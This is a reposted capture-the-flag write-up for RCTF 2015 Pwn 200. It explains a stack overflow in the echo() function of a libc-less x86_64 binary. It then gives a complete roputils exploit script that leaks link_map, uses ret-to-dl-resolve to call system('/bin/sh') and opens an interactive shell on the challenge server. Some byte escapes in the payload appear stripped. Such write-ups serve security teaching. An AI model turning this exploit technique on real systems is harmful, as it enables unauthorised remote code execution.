RCTF 2015 Pwn 200

admin
admin
admin
140497
文章
117
评论
2021年9月1日14:34:05评论49 views字数 1776阅读5分55秒阅读模式

RCTF 2015 Pwn 200

Last updated:Nov.15, 2015 CST 20:26:43

A x86_64 program without libc, and protected with NX and maybe ASLR. A stack overflow problem can be easily found in function echo():

Location of problem

The space on the stack is only 0x20, while we can give a string length at 0x400 and completely controlable. Ret-to-dl-resolve will also be used to escape from NX.

However, the function echo() will stop copying once it meets a 0x00. After a reconsidering of this stack structure, it is not something big. Since our data is also stored on stack, and under x86_64, since arguments are not passed through stack(at least in this function), we can just make the copy function stop at a certain point, and pop again to use our own rop chain. Though it might be stripped in echo(), we can actually not considering it.

The exp script is as below.

Thanks to Bigtang for showing me this way to bypass its protect.

Thanks to roputils for its excellent script.

#"a"*24 -> pop4+ret -> [ROP jobs]
from roputils import *

offset=32
fpath='./pwn200'
#p=Proc(rop.fpath)
p=Proc(host='180.76.178.48',port=6666)

rop=ROP(fpath)
addr_stage=rop.section('.bss')+0x400
ptr_ret=rop.search(rop.section('.fini'))

buf='a'*24+'x9cx08x40x00x00x00x00x00'
buf += rop.call_chain_ptr(          # have a rop chain to leak the address
    ['write', 1, rop.got()+8, 8],
    ['read', 0, addr_stage, 420]
, pivot=addr_stage)
buf += rop.fill(0x100, buf)

p.write(buf)
p.read(16)
addr_link_map = p.read_p64()
print("link_map is at %s" % hex(addr_link_map))
addr_dt_debug = addr_link_map + 0x1c8

buf = rop.call_chain_ptr(
    ['read', 0, addr_dt_debug, 8],
    [ptr_ret, addr_stage+400]
)
buf += rop.dl_resolve_call(addr_stage+300)
buf += rop.fill(300, buf)
buf += rop.dl_resolve_data(addr_stage+300, 'system')
buf += rop.fill(400, buf)
buf += rop.string('/bin/sh')
buf += rop.fill(420, buf)

p.write(buf)
p.write_p64(0)
p.interact(0)

FROM :blog.iret.xyz | Author:blog.iret.xyz

相关推荐: 阿里云配置CDN加速博客

博客的图床已经配置了七牛云HTTPS 具体配置看上篇文章: MacOS下重建Hexo博客2.0全记录 阿里云CDN加速和全站加速DCDN的区别阿里云有两种加速方式,CDN加速和全站加速DCDN。前者也叫静态加速,后者叫动态加速。 什么是阿里云CDN阿里云内容分…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日14:34:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RCTF 2015 Pwn 200https://cn-sec.com/archives/499506.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息